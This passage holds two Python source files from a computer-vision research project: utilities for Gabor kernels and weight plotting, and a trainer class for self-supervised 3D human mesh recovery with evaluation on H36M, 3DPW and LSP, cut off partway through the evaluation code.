import matplotlib.pyplot as plt
import numpy as np
from matplotlib import gridspec
from scipy.special import factorial
from plot.plot_data import plot_matrixImage
def normalize(X):
f_min, f_max = X.min(), X.max()
return (X - f_min) / (f_max - f_min)
def gabor_kernel_2(frequency, sigma_x, sigma_y, theta=0, offset=0, ks=61):
w = np.floor(ks / 2)
y, x = np.mgrid[-w:w + 1, -w:w + 1]
rotx = x * np.cos(theta) + y * np.sin(theta)
roty = -x * np.sin(theta) + y * np.cos(theta)
g = np.zeros(y.shape)
g[:] = np.exp(-0.5 * (rotx ** 2 / sigma_x ** 2 + roty ** 2 / sigma_y ** 2))
g /= 2 * np.pi * sigma_x * sigma_y
g *= np.cos(2 * np.pi * frequency * rotx + offset)
return g
def gabor_kernel_3(frequency, x_c, y_c, sigma_x, sigma_y, theta=0, offset=0, ks=61, scale=1):
w = np.floor(ks / 2)
y, x = np.mgrid[-w:w + 1, -w:w + 1]
rotx = (x - x_c) * np.cos(theta) + (y - y_c) * np.sin(theta)
roty = -(x - x_c) * np.sin(theta) + (y - y_c) * np.cos(theta)
g = np.zeros(y.shape)
g[:] = np.exp(-0.5 * (rotx ** 2 / sigma_x ** 2 + roty ** 2 / sigma_y ** 2))
g /= 2 * np.pi * sigma_x * sigma_y
g *= np.cos(2 * np.pi * frequency * rotx + offset)
return g * scale
def poisson(k, lamb):
"""poisson pdf, parameter lamb is the fit parameter"""
return (lamb ** k / factorial(k)) * np.exp(-lamb)
def negLogLikelihood(params, data):
""" the negative log-Likelohood-Function"""
lnl = - np.sum(np.log(poisson(data, params[0])))
return lnl
# def tfm_poisson_pdf(x, mu):
# y, J = transformation_and_jacobian(x)
# # For numerical stability, compute exp(log(f(x)))
# return np.exp(y * np.log(mu) - mu - gammaln(y + 1.)) * J
def plot_conv_weights(weights, model_name):
length = weights.shape[0] * weights.shape[2]
matrix = np.zeros([length, 0])
for i in range(0, weights.shape[0]):
row = np.empty([0, weights.shape[2]])
for j in range(0, weights.shape[1]):
row = np.concatenate((row, weights[i, j]), axis=0)
# f_min, f_max = np.min(row), np.max(row)
# row = (row - f_min) / (f_max - f_min)
# row[0,0] = 0
matrix = np.concatenate((matrix, row), axis=1)
# matrix[0,0] = 1
f_min, f_max = np.min(matrix), np.max(matrix)
matrix = (matrix - f_min) / (f_max - f_min)
plot_matrixImage(matrix, 'weights_' + model_name)
def plot_weights(weights, model_name, gs=None, name=None):
show = False
if gs is None:
plt.figure(figsize=(10, 2), frameon=False)
inner = gridspec.GridSpec(weights.shape[0], weights.shape[1], wspace=0.2, hspace=0.2)
show = True
else:
inner = gridspec.GridSpecFromSubplotSpec(weights.shape[0], 8,
subplot_spec=gs, wspace=0.1, hspace=0.1)
# gs = gridspec.GridSpec(, width_ratios=[1] * weights.shape[1],
# wspace=0.5, hspace=0.5, top=0.95, bottom=0.05, left=0.1, right=0.95)
idx = 0
for i in range(0, weights.shape[0]):
for j in range(0, weights.shape[1]):
kernel1 = weights[i, j]
ax_ = plt.subplot(inner[i, j])
ax_.set_xticks([])
ax_.set_yticks([])
ax_.set_axis_off()
ax_.imshow(kernel1, cmap='gray')
#
idx += 1
if j == 0:
ax_.set_title(name, pad=10, weight='semibold', size=16)
if show:
plt.tight_layout()
plt.savefig(f'weights_{model_name}.png')
plt.show()
def show_kernels(weights, func_name, gs=None):
number = math.ceil(math.sqrt(weights.shape[0]))
img = np.transpose(weights, (0, 2, 3, 1))
idx = 0
show = False
if gs is None:
plt.figure(figsize=(10, 10))
inner = gridspec.GridSpec(1, weights.shape[0], wspace=0.2, hspace=0.2)
show = True
else:
inner = gridspec.GridSpecFromSubplotSpec(1, 8,
subplot_spec=gs, wspace=0.1, hspace=0.1)
# fig, axes = pyplot.subplots(ncols=weights.shape[0], figsize=(20, 4))
for j in range(weights.shape[0]): # in zip(axes, range(weights.shape[0])):
# for i in range(number):
ax_ = plt.subplot(inner[idx])
ax_.set_xticks([])
ax_.set_yticks([])
ax_.set_axis_off()
# ax.set_title(f'Kernel {idx}', pad=3)
# imgs = img[range(j*8, (j*8)+number)]
channel = img[idx]
f_min, f_max = channel.min(), channel.max()
channel = (channel - f_min) / (f_max - f_min)
ax_.imshow(channel)
if j == 0:
ax_.set_title(func_name, pad=10, weight='bold', size=18)
idx += 1
if show:
plt.tight_layout()
plt.savefig(f'kernels_{func_name}.png')
plt.show()
def similarity(m1, m2):
sum = 0
for i in range(m1.shape[0]):
for j in range(m1.shape[1]):
sum += np.abs(m1[i, j] - m2[i, j])
return sum / (m1.shape[0] * m1.shape[1])
| franzigeiger/training_reductions | utils/gabors.py | gabors.py | py | 5,020 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "numpy.floor",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.mgrid",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "numpy.cos",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "numpy.sin",
"line_number":... |
70553069544 | import os, datetime, time
import torch
import torch.optim as optim
import numpy as np
import math
import cv2
import tqdm
import config
import constants
from utils.trainer_utils import (
AverageMeter,
get_HHMMSS_from_second,
save_checkpoint,
save_all_img,
save_joints3d_img,
save_mesh,
save_templates_info,
train_only_3task_network,
train_hmr_using_3task,
train_hmr_using_joints,
train_texture_net,
train_hmr_using_adv_loss,
)
from utils.imutils import uncrop
from lib.utils.eval_utils import (
batch_compute_similarity_transform_torch,
)
from lib.utils.geometry import batch_rodrigues
from lib.models.smpl import SMPL, SMPL_MODEL_DIR, H36M_TO_J14, SMPL_MEAN_PARAMS
# import soft_renderer as sr
# from soft_renderer.mesh import Mesh
# from soft_renderer.renderer import SoftRenderer
# import soft_renderer.cuda.load_textures as load_textures_cuda
from lib.models.smpl import get_smpl_faces
class Trainer():
def __init__(
self,
model_name,
HMR,
context_encoder_net,
discriminator,
jigsaw_puzzle_net,
rotation_net,
texture_net,
img_renderer,
seg_renderer,
texture_discriminator,
train_dataloader,
test_dataloader,
test_dataloader_h36m,
test_dataloader_3dpw,
test_dataloader_lsp,
loss_fn_BCE,
loss_fn_CE,
loss_fn_MSE,
loss_fn_keypoints,
loss_fn_mask,
HMR_optimizer_all,
HMR_scheduler_all,
discriminator_optimizer,
context_encoder_optimizer,
jigsaw_puzzle_optimizer,
rotation_optimizer,
texture_net_optimizer,
texture_discriminator_optimizer,
device,
num_epoch,
args
):
self.model_name = model_name
self.args = args
# model
self.HMR = HMR
self.context_encoder_net = context_encoder_net
self.jigsaw_puzzle_net = jigsaw_puzzle_net
self.rotation_net = rotation_net
self.discriminator = discriminator
self.texture_net = texture_net
self.img_renderer = img_renderer
self.seg_renderer = seg_renderer
self.texture_discriminator = texture_discriminator
# device
self.device = device
# dataloader
self.train_dataloader = train_dataloader
if test_dataloader:
self.test_dataloader = test_dataloader
if test_dataloader_h36m:
self.test_dataloader_h36m = test_dataloader_h36m
if test_dataloader_3dpw:
self.test_dataloader_3dpw = test_dataloader_3dpw
if test_dataloader_lsp:
self.test_dataloader_lsp = test_dataloader_lsp
# loss
self.loss_fn_BCE = loss_fn_BCE
self.loss_fn_CE = loss_fn_CE
self.loss_fn_MSE = loss_fn_MSE
self.loss_fn_keypoints = loss_fn_keypoints
self.loss_fn_mask = loss_fn_mask
# optimizer
self.HMR_optimizer_all = HMR_optimizer_all
self.HMR_scheduler_all = HMR_scheduler_all
self.discriminator_optimizer = discriminator_optimizer
self.context_encoder_optimizer = context_encoder_optimizer
self.jigsaw_puzzle_optimizer = jigsaw_puzzle_optimizer
self.rotation_optimizer = rotation_optimizer
self.texture_net_optimizer = texture_net_optimizer
self.texture_discriminator_optimizer = texture_discriminator_optimizer
# Valiable
self.num_epoch = num_epoch
self.freq_print = args.freq_print
self.num_patch = 4
self.tex_size = args.tex_size
today = datetime.datetime.now()
self.today = datetime.datetime.strftime(today, "%y%m%d_%H%M%S")
self.output_dir = self.args.output_dir if self.args.output_dir else self.today
# smpl and J_regressor
self.smpl_neutral = SMPL("data/vibe_data",
create_transl=False).to(self.device)
self.smpl_male = SMPL("data/vibe_data",
gender='male',
create_transl=False).to(self.device)
self.smpl_female = SMPL("data/vibe_data",
gender='female',
create_transl=False).to(self.device)
self.J_regressor = np.load("data/vibe_data/J_regressor_h36m.npy")
self.J_regressor_torch = torch.from_numpy(self.J_regressor).float()
parts_texture = np.load("data/vertex_texture.npy")
self.parts_texture = torch.from_numpy(parts_texture).to(self.device).float()
self.cube_parts = torch.FloatTensor(np.load("data/cube_parts.npy")).to(self.device)
def train(self):
print("===================Train===================\nEpoch {} Start".format(self.epoch+1))
train_template = \
'Epoch: {}/{} | Batch_idx: {}/{} | ' \
'loss_DC: {losses_DC.val:.4f} ({losses_DC.avg:.4f}) | loss_CE: {losses_CE.val:.4f} ({losses_CE.avg:.4f}) | ' \
'loss_JP: {losses_JP.val:.4f} ({losses_JP.avg:.4f}) | acc_JP: {acces_JP.val:.4f} ({acces_JP.avg:.4f}) | ' \
'loss_ROT: {losses_ROT.val:.4f} ({losses_ROT.avg:.4f}) | acc_ROT: {acces_ROT.val:.4f} ({acces_ROT.avg:.4f}) | ' \
'loss_Texture: {losses_texture_ori_img.val:.4f} ({losses_texture_ori_img.avg:.4f}) | ' \
'loss_Seg: {losses_seg.val:.4f} ({losses_seg.avg:.4f}) | ' \
'loss_Texture_Total: {losses_texture_total.val:.4f} ({losses_texture_total.avg:.4f}) | ' \
'loss_disc_e: {losses_disc_e.val:.4f} ({losses_disc_e.avg:.4f}) | ' \
'loss_disc_d: {losses_disc.val:.4f} ({losses_disc.avg:.4f}) | ' \
'loss_disc_real: {losses_disc_real.val:.4f} ({losses_disc_real.avg:.4f}) | ' \
'loss_disc_fake: {losses_disc_fake.val:.4f} ({losses_disc_fake.avg:.4f}) | ' \
'loss_HMR_3task: {losses_HMR_3task.val:.4f} ({losses_HMR_3task.avg:.4f}) | ' \
'loss_HMR_joints3d: {losses_HMR_joints3d.val:.4f} ({losses_HMR_joints3d.avg:.4f}) | ' \
'loss_joints: {losses_joints.val:.4f} ({losses_joints.avg:.4f}) | ' \
'MPJPE: {train_MPJPE.val:.4f} ({train_MPJPE.avg:.4f}) | ' \
'PA_MPJPE: {train_PA_MPJPE.val:.4f} ({train_PA_MPJPE.avg:.4f}) | ' \
'loss_total: {losses_total.val:.4f} ({losses_total.avg:.4f}) | ' \
'Batch duration: {duration}'
batch_start = time.time()
self.losses_DC = AverageMeter() # Discriminator Loss
self.losses_CE = AverageMeter() # Context Encoder Loss
self.losses_JP = AverageMeter() # Jigsaw Puzzle Loss
self.acces_JP = AverageMeter() # Jigsaw Puzzle Accuracy
self.losses_ROT = AverageMeter() # Rotation Loss
self.acces_ROT = AverageMeter() # Rotation Accuracy
self.losses_texture_ori_img = AverageMeter() # Texture Loss
self.losses_seg = AverageMeter() # Segmentation Loss
self.losses_texture_total = AverageMeter() # Texture Loss + Segmentation Loss
self.losses_HMR_3task = AverageMeter() # Discriminator Loss + Context Encoder Loss + Roation Loss
self.losses_disc_e = AverageMeter() # Encoder Discriminator Loss for rendering img
self.losses_disc = AverageMeter() # Real + Fake Discriminator Loss
self.losses_disc_real = AverageMeter() # Discriminator Loss for Real
self.losses_disc_fake = AverageMeter() # Discriminator Loss for Fake
self.losses_total = AverageMeter() # Total Sum Loss
self.losses_joints = AverageMeter() # 2d + 3d joints loss
self.losses_HMR_joints3d = AverageMeter() # 3D joints loss
self.train_MPJPE = AverageMeter() # MPJPE
self.train_PA_MPJPE = AverageMeter() # PA_MPJPE
len_train_dataloader = len(self.train_dataloader)
for batch_idx, item in tqdm.tqdm(enumerate(self.train_dataloader), desc='Train {}/{}'.format(self.epoch+1, self.num_epoch), total=len(self.train_dataloader)):
img = item['img'].to(self.device)
black_img = item['black_img'].to(self.device)
context_encoder_input = item['context_encoder_input'].to(self.device)
center_crop_img = item['center_crop_img'].to(self.device)
jigsaw_input = item['jigsaw_input'].to(self.device)
rotation_img = item['rotation_input'].to(self.device)
jigsaw_order = item['jigsaw_order'].to(self.device)
rotation_idx = item['rotation_idx'].to(self.device)
joints3d = item['pose_3d'].to(self.device)
has_joints3d = item['has_pose_3d'].to(self.device)
joints2d = item['keypoints'].to(self.device)
batch_size = img.shape[0]
gt_mask = item['gt_mask'].to(self.device)
has_mask = item['has_mask'].to(self.device)
self.zeros = torch.zeros([batch_size, 1]).to(self.device)
self.ones = torch.ones([batch_size, 1]).to(self.device)
faces = get_smpl_faces().astype(np.int32)
faces = torch.from_numpy(faces).to(self.device)
faces = faces.expand((batch_size, -1, -1))
joint_mapper_gt = constants.J24_TO_J17 if self.args.test_dataset == 'mpi-inf-3dhp' else constants.J24_TO_J14
if self.epoch < self.args.first_stage_nEpoch: # Epoch 0~9
# Training 3 Task net
# Discriminator, Context Encoder, Jigsaw Puzzle, Rotation net
self.HMR.eval()
self.context_encoder_net.train()
self.discriminator.train()
self.jigsaw_puzzle_net.train()
self.rotation_net.train()
output_ce_224 = \
train_only_3task_network(
self.HMR,
self.context_encoder_net,
self.discriminator,
self.jigsaw_puzzle_net,
self.rotation_net,
self.loss_fn_BCE,
self.loss_fn_MSE,
self.loss_fn_CE,
self.losses_CE,
self.losses_DC,
self.acces_JP,
self.losses_JP,
self.acces_ROT,
self.losses_ROT,
self.discriminator_optimizer,
self.context_encoder_optimizer,
self.jigsaw_puzzle_optimizer,
self.rotation_optimizer,
img,
context_encoder_input,
center_crop_img,
jigsaw_input,
jigsaw_order,
rotation_img,
rotation_idx,
self.num_patch,
self.ones,
self.zeros,
batch_size,
)
# Training Texture Net
self.texture_net.train()
output_train_texture_net = \
train_texture_net(
self.HMR,
self.texture_net,
self.img_renderer,
self.loss_fn_MSE,
self.loss_fn_mask,
self.losses_texture_ori_img,
self.losses_seg,
self.losses_texture_total,
self.texture_net_optimizer,
img,
black_img,
batch_size,
self.args,
gt_mask,
has_mask,
train_first_stage=True
)
mask = output_train_texture_net[0]
detach_images = output_train_texture_net[1]
rendering = output_train_texture_net[2]
vertices = output_train_texture_net[3]
# train hmr & texture net using 3task, rendering, segmentation and gan loss (or joints)
else: # Epoch 10~19
self.HMR.eval()
self.context_encoder_net.eval()
self.discriminator.eval()
self.jigsaw_puzzle_net.eval()
self.rotation_net.eval()
self.texture_net.train()
self.texture_discriminator.train()
# Training Mesh network (HMR) using 3 Task Loss
loss_HMR, output_ce_224 = \
train_hmr_using_3task(
self.HMR,
self.context_encoder_net,
self.discriminator,
self.jigsaw_puzzle_net,
self.rotation_net,
self.loss_fn_BCE,
self.loss_fn_MSE,
self.loss_fn_CE,
self.losses_CE,
self.acces_JP,
self.losses_JP,
self.acces_ROT,
self.losses_ROT,
self.losses_HMR_3task,
img,
context_encoder_input,
center_crop_img,
jigsaw_input,
jigsaw_order,
rotation_img,
rotation_idx,
self.num_patch,
self.ones,
self.zeros,
batch_size,
self.args
)
loss_all = loss_HMR
# Trainign Texture net
output_train_texture_net = \
train_texture_net(
self.HMR,
self.texture_net,
self.img_renderer,
self.loss_fn_MSE,
self.loss_fn_mask,
self.losses_texture_ori_img,
self.losses_seg,
self.losses_texture_total,
self.texture_net_optimizer,
img,
black_img,
batch_size,
self.args,
gt_mask,
has_mask,
train_first_stage=False
)
texture_loss = output_train_texture_net[0]
loss_all += texture_loss
mask = output_train_texture_net[1]
detach_images = output_train_texture_net[2]
rendering = output_train_texture_net[3]
vertices = output_train_texture_net[4]
# Trining HMR using adversarial loss
e_disc_loss, d_disc_loss, rendering_bg = \
train_hmr_using_adv_loss(
self.HMR,
self.texture_discriminator,
self.texture_net,
self.img_renderer,
self.losses_disc_e,
self.losses_disc,
self.losses_disc_real,
self.losses_disc_fake,
img,
batch_size,
)
loss_all += e_disc_loss
self.texture_discriminator_optimizer.zero_grad()
d_disc_loss.backward()
self.texture_discriminator_optimizer.step()
if not self.args.self_supervised:
# Training Mesh network (HMR) using joints
joints_loss, mpjpe, pa_mpjpe, num_data = train_hmr_using_joints(
self.HMR,
self.loss_fn_keypoints,
self.losses_HMR_joints3d,
img,
joints2d,
joints3d,
has_joints3d,
joint_mapper_gt,
batch_size,
self.device,
self.args,
)
loss_all += joints_loss
self.losses_joints.update(joints_loss.item(), num_data)
self.train_MPJPE.update(mpjpe.item(), num_data)
self.train_PA_MPJPE.update(pa_mpjpe.item(), num_data)
self.HMR_optimizer_all.zero_grad()
self.losses_total.update(loss_all.item(), batch_size)
loss_all.backward()
self.HMR_optimizer_all.step()
if (batch_idx==0 or (batch_idx+1)%self.args.freq_print==0):
for i in range(10 if batch_size > 10 else batch_size):
img_dict = dict()
### original img ###
img_dict["orig_img.jpg"] = img[i]
### context encoder input img ###
img_dict["ce_input_img.jpg"] = context_encoder_input[i].clone().detach()
### center crop img for CE ###
img_dict["center_crop_img.jpg"] = center_crop_img[i].clone().detach()
### output img of CE ###
img_dict["reconst_img.jpg"] = output_ce_224[i].clone().detach()
### jigsaw input img ###
img_dict["jigsaw_input_img.jpg"] = jigsaw_input[i].clone().detach()
### ratation input img ###
img_dict["rotation_input_img.jpg"] = rotation_img[i].clone().detach()
### texture img ###
img_dict["rendering.jpg"] = rendering[i].clone().detach()
### segmentation img ###
img_dict["mask.jpg"] = mask[i].clone().detach()
### detach img ###
img_dict["detach.jpg"] = detach_images[i].clone().detach()
### Segmentation gt ###
img_dict["seg_gt.jpg"] = gt_mask[i].clone().detach()
if self.epoch >= self.args.first_stage_nEpoch:
### rendering background ###
img_dict["rendering_bg.jpg"] = rendering_bg[i].clone().detach()
save_all_img(img_dict, self.output_dir,
self.epoch+1, i+batch_idx)
### save mesh ###
if self.epoch >= self.args.first_stage_nEpoch:
_faces = faces[i].clone().detach()
_vertices = vertices[i].clone().detach()
save_mesh(
_vertices, _faces,
self.output_dir,
self.epoch+1,
i,
)
### print train info while running in batch loop ###
if (batch_idx+1) % self.freq_print == 0 or (batch_idx+1) == len_train_dataloader:
train_template_filled = train_template.format(
self.epoch+1, self.num_epoch,
batch_idx+1, len(self.train_dataloader),
losses_DC=self.losses_DC,
losses_CE=self.losses_CE,
losses_JP=self.losses_JP,
acces_JP=self.acces_JP,
losses_ROT=self.losses_ROT,
acces_ROT=self.acces_ROT,
losses_texture_ori_img=self.losses_texture_ori_img,
losses_seg=self.losses_seg,
losses_texture_total=self.losses_texture_total,
losses_disc_e=self.losses_disc_e,
losses_disc=self.losses_disc,
losses_disc_real=self.losses_disc_real,
losses_disc_fake=self.losses_disc_fake,
losses_HMR_3task=self.losses_HMR_3task,
losses_HMR_joints3d=self.losses_HMR_joints3d,
losses_joints=self.losses_joints,
losses_total=self.losses_total,
train_MPJPE=self.train_MPJPE,
train_PA_MPJPE=self.train_PA_MPJPE,
duration=get_HHMMSS_from_second(seconds=(time.time()-batch_start))
)
print(train_template_filled)
self.train_templates.append(train_template_filled)
if (batch_idx+1) == len_train_dataloader:
self.train_templates.append("======================================================================")
batch_start = time.time()
### save train info when one epoch is completed ###
save_templates_info(self.train_templates, self.output_dir, "train_templates.txt")
print("Train Time: {train_time}, Total Time: {total_time}".format(
train_time=get_HHMMSS_from_second(seconds=(time.time()-self.epoch_start)),
total_time=get_HHMMSS_from_second(seconds=(time.time()-self.total_start))))
### Evaluate ###
def evaluate(self, test_dataloader, test_dataset_name, is_save_pth=True):
joint_mapper_h36m = constants.H36M_TO_J17 if self.args.test_dataset == 'mpi-inf-3dhp' else constants.H36M_TO_J14
joint_mapper_gt = constants.J24_TO_J17 if self.args.test_dataset == 'mpi-inf-3dhp' else constants.J24_TO_J14
test_start = time.time()
self.HMR.eval()
if self.args.train == 0:
if test_dataset_name == "h36m" or test_dataset_name == "3dpw":
test_template_batch = \
'===================Test===================\n' \
'Batch: {}/{} | ' \
'Mpjpe: {mpjpe_average_meter.avg:.2f} ' \
'Rec_error: {pa_mpjpe_average_meter.avg:.2f} ' \
'\n=========================================='
elif test_dataset_name == "lsp":
test_template_batch = \
'===================Test===================\n' \
'Batch: {}/{} | ' \
'Part acc: {part_Acc_average_meter:.2f} ' \
'Part F1: {part_F1_average_meter:.2f} ' \
'FG-BG Acc: {Acc_average_meter:.2f} ' \
'FG-BG F1: {F1_average_meter:.2f} ' \
'\n=========================================='
if test_dataset_name == "h36m":
test_template = \
'===================Test===================\n' \
'Test Data: {} | ' \
'Epoch: {}/{} | ' \
'Mpjpe: {mpjpe_average_meter.avg:.2f} | ' \
'Rec_error: {pa_mpjpe_average_meter.avg:.2f} | ' \
'loss: {losses.avg:.5f} | ' \
'Test Time: {test_time} | Epoch Time: {epoch_time} | ' \
'Total Time: {total_time}' \
'\n=========================================='
elif test_dataset_name == "3dpw":
test_template = \
'===================Test===================\n' \
'Test Data: {} | ' \
'Epoch: {}/{} | ' \
'Mpjpe: {mpjpe_average_meter.avg:.2f} | ' \
'Rec_error: {pa_mpjpe_average_meter.avg:.2f} | ' \
'Test Time: {test_time} | Epoch Time: {epoch_time} | ' \
'Total Time: {total_time}' \
'\n=========================================='
elif test_dataset_name == "lsp":
test_template = \
'===================Test===================\n' \
'Test Data: {} | ' \
'Epoch: {}/{} | ' \
'Part acc: {part_Acc_average_meter:.2f} | ' \
'Part F1: {part_F1_average_meter:.2f} | ' \
'FG-BG Acc: {Acc_average_meter:.2f} | ' \
'FG-BG F1: {F1_average_meter:.2f} | ' \
'Test Time: {test_time} | Epoch Time: {epoch_time} | ' \
'Total Time: {total_time}' \
'\n=========================================='
self.mpjpe_average_meter = AverageMeter()
self.pa_mpjpe_average_meter = AverageMeter()
self.losses = AverageMeter()
self.part_Acc_average_meter = 0
self.part_F1_average_meter = 0
self.Acc_average_meter = 0
self.F1_average_meter = 0
if self.args.train != 0:
if test_dataset_name == "h36m":
current_mpjpe = self.current_mpjpe_h36m
elif test_dataset_name == "3dpw":
current_mpjpe = self.current_mpjpe_3dpw
elif test_dataset_name == "lsp":
current_acc = self.current_acc_lsp
batch_num = len(test_dataloader)
accuracy = 0.
parts_accuracy = 0.
pixel_count = 0
parts_pixel_count = 0
tp = np.zeros((2,1))
fp = np.zeros((2,1))
fn = np.zeros((2,1))
parts_tp = np.zeros((7,1))
parts_fp = np.zeros((7,1))
parts_fn = np.zeros((7,1))
with torch.no_grad():
for batch_idx, item in tqdm.tqdm(enumerate(test_dataloader), desc='{} Eval'.format(test_dataset_name), total=len(test_dataloader)):
# Validation for early stopping
if test_dataset_name == "h36m":
img = item["img"]
img = img.to(self.device)
batch_size = img.shape[0]
output = self.HMR(img, J_regressor=self.J_regressor)
output = output[-1]
pred_j3ds = output['kp_3d']
pred_pelvis = (pred_j3ds[:,[2],:] + pred_j3ds[:,[3],:]) / 2.0
pred_j3ds -= pred_pelvis
target_j3ds = item["pose_3d"]
target_j3ds = target_j3ds[:, joint_mapper_gt, :-1]
target_j3ds = target_j3ds.float().to(self.device)
target_pelvis = (target_j3ds[:,[2],:] + target_j3ds[:,[3],:]) / 2.0
target_j3ds -= target_pelvis
loss = self.loss_fn_MSE(pred_j3ds, target_j3ds)
self.losses.update(loss.item(), batch_size)
if test_dataset_name == "h36m" or test_dataset_name == "3dpw":
img = item["img"]
img = img.to(self.device)
batch_size = img.shape[0]
output = self.HMR(img, J_regressor=self.J_regressor)
output = output[-1]
pred_j3ds = output['kp_3d']
pred_pelvis = (pred_j3ds[:,[2],:] + pred_j3ds[:,[3],:]) / 2.0
pred_j3ds -= pred_pelvis
pred_vertices = output["verts"]
faces = get_smpl_faces().astype(np.int32)
faces = torch.from_numpy(faces).to(self.device)
faces = faces.expand((batch_size, -1, -1))
J_regressor_batch = self.J_regressor_torch[None, :].expand(pred_vertices.shape[0], -1, -1).to(self.device)
if test_dataset_name == 'h36m':
target_j3ds = item["pose_3d"]
target_j3ds = target_j3ds[:, joint_mapper_gt, :-1]
else:
gt_pose = item["pose"].to(self.device)
gt_betas = item["betas"].to(self.device)
gender = item["gender"].to(self.device)
gt_vertices = self.smpl_male(global_orient=gt_pose[:,:3], body_pose=gt_pose[:,3:], betas=gt_betas).vertices
gt_vertices_female = self.smpl_female(global_orient=gt_pose[:,:3], body_pose=gt_pose[:,3:], betas=gt_betas).vertices
gt_vertices[gender==1, :, :] = gt_vertices_female[gender==1, :, :]
target_j3ds = torch.matmul(J_regressor_batch, gt_vertices)
gt_pelvis = target_j3ds[:, [0],:].clone()
target_j3ds = target_j3ds[:, joint_mapper_h36m, :]
target_j3ds = target_j3ds - gt_pelvis
target_j3ds = target_j3ds.float().to(self.device)
target_pelvis = (target_j3ds[:,[2],:] + target_j3ds[:,[3],:]) / 2.0
target_j3ds -= target_pelvis
errors = torch.sqrt(((pred_j3ds - target_j3ds) ** 2).sum(dim=-1)).mean(dim=-1).cpu().numpy()
S1_hat = batch_compute_similarity_transform_torch(pred_j3ds, target_j3ds)
errors_pa = torch.sqrt(((S1_hat - target_j3ds) ** 2).sum(dim=-1)).mean(dim=-1).cpu().numpy()
m2mm = 1000
mpjpe = np.mean(errors) * m2mm
pa_mpjpe = np.mean(errors_pa) * m2mm
self.mpjpe_average_meter.update(mpjpe, batch_size)
self.pa_mpjpe_average_meter.update(pa_mpjpe, batch_size)
elif test_dataset_name == "lsp":
annot_path = config.DATASET_FOLDERS['upi-s1h']
img = item["img"]
img = img.to(self.device)
batch_size = img.shape[0]
orig_shape = item["orig_shape"].cpu().numpy()
scale = item["scale"].cpu().numpy()
center = item["center"].cpu().numpy()
output = self.HMR(img, J_regressor=self.J_regressor)
output = output[-1]
pred_vertices = output["verts"]
cam = output['theta'][:, :3]
faces = get_smpl_faces().astype(np.int32)
faces = torch.from_numpy(faces).to(self.device)
faces = faces.expand((batch_size, -1, -1))
mask, parts = self.seg_renderer(pred_vertices, cam)
save_gt_parts = []
save_gt_seg = []
for i in range(batch_size):
# After rendering, convert imate back to original resolution
pred_mask = uncrop(mask[i].cpu().numpy(), center[i], scale[i], orig_shape[i]) > 0
# Load gt mask
gt_mask = cv2.imread(os.path.join(annot_path, item['maskname'][i]), 0) > 0
if batch_idx == 0:
save_gt_seg.append(gt_mask)
# Evaluation consistent with the original UP-3D code
accuracy += (gt_mask == pred_mask).sum()
pixel_count += np.prod(np.array(gt_mask.shape))
for c in range(2):
cgt = gt_mask == c
cpred = pred_mask == c
tp[c] += (cgt & cpred).sum()
fp[c] += (~cgt & cpred).sum()
fn[c] += (cgt & ~cpred).sum()
f1 = 2 * tp / (2 * tp + fp + fn)
for i in range(batch_size):
pred_parts = uncrop(parts[i].cpu().numpy().astype(np.uint8), center[i], scale[i], orig_shape[i])
# Load gt part segmentation
gt_parts = cv2.imread(os.path.join(annot_path, item['partname'][i]), 0)
if batch_idx == 0:
save_gt_parts.append(gt_parts)
# Evaluation consistent with the original UP-3D code
# 6 parts + background
for c in range(7):
cgt = gt_parts == c
cpred = pred_parts == c
cpred[gt_parts == 255] = 0
parts_tp[c] += (cgt & cpred).sum()
parts_fp[c] += (~cgt & cpred).sum()
parts_fn[c] += (cgt & ~cpred).sum()
gt_parts[gt_parts == 255] = 0
pred_parts[pred_parts == 255] = 0
parts_f1 = 2 * parts_tp / (2 * parts_tp + parts_fp + parts_fn)
parts_accuracy += (gt_parts == pred_parts).sum()
parts_pixel_count += np.prod(np.array(gt_parts.shape))
self.part_Acc_average_meter = (parts_accuracy / parts_pixel_count) * 100
self.part_F1_average_meter = parts_f1[[0,1,2,3,4,5,6]].mean()
self.Acc_average_meter = (accuracy / pixel_count) * 100
self.F1_average_meter = f1.mean()
if batch_idx == 0:
for i in range(10 if batch_size > 10 else batch_size):
img_dict = dict()
img_dict["orig_img.jpg"] = img[i]
if test_dataset_name == "h36m" or test_dataset_name == "3dpw":
save_joints3d_img(
target_j3ds[i],
pred_j3ds[i],
self.output_dir,
self.epoch+1,
test_dataset=test_dataset_name,
test_idx=i
)
save_mesh(
pred_vertices[i],
faces[i],
self.output_dir,
self.epoch+1,
test_dataset=test_dataset_name,
test_idx=i
)
elif test_dataset_name == "lsp":
img_dict["mask.jpg"] = mask[i].cpu().numpy()
img_dict["parts.jpg"] = parts[i].cpu().numpy()
img_dict["gt_parts.jpg"] = save_gt_parts[i]
img_dict["gt_seg.jpg"] = save_gt_seg[i]
save_all_img(img_dict, self.output_dir, self.epoch+1, test_dataset=test_dataset_name, test_idx=i)
if self.args.train == 0 and (batch_idx+1) % self.args.freq_print_test == 0:
if test_dataset_name == "h36m" or test_dataset_name == "3dpw":
test_template_batch_filled = test_template_batch.format(
batch_idx+1,
batch_num,
mpjpe_average_meter=self.mpjpe_average_meter,
pa_mpjpe_average_meter=self.pa_mpjpe_average_meter,
)
elif test_dataset_name == "lsp":
test_template_batch_filled = test_template_batch.format(
batch_idx+1,
batch_num,
part_Acc_average_meter=self.part_Acc_average_meter,
part_F1_average_meter=self.part_F1_average_meter,
Acc_average_meter=self.Acc_average_meter,
F1_average_meter=self.F1_average_meter,
)
print(test_template_batch_filled)
if test_dataset_name == "h36m" or test_dataset_name == "3dpw":
test_template_filled = test_template.format(
test_dataset_name,
self.epoch+1,
self.num_epoch,
mpjpe_average_meter=self.mpjpe_average_meter,
pa_mpjpe_average_meter=self.pa_mpjpe_average_meter,
losses=self.losses,
test_time=get_HHMMSS_from_second(seconds=(time.time()-test_start)),
epoch_time=get_HHMMSS_from_second(seconds=(time.time()-self.epoch_start)),
total_time=get_HHMMSS_from_second(seconds=(time.time()-self.total_start))
)
elif test_dataset_name == "3dpw":
test_template_filled = test_template.format(
test_dataset_name,
self.epoch+1,
self.num_epoch,
mpjpe_average_meter=self.mpjpe_average_meter,
pa_mpjpe_average_meter=self.pa_mpjpe_average_meter,
test_time=get_HHMMSS_from_second(seconds=(time.time()-test_start)),
epoch_time=get_HHMMSS_from_second(seconds=(time.time()-self.epoch_start)),
total_time=get_HHMMSS_from_second(seconds=(time.time()-self.total_start))
)
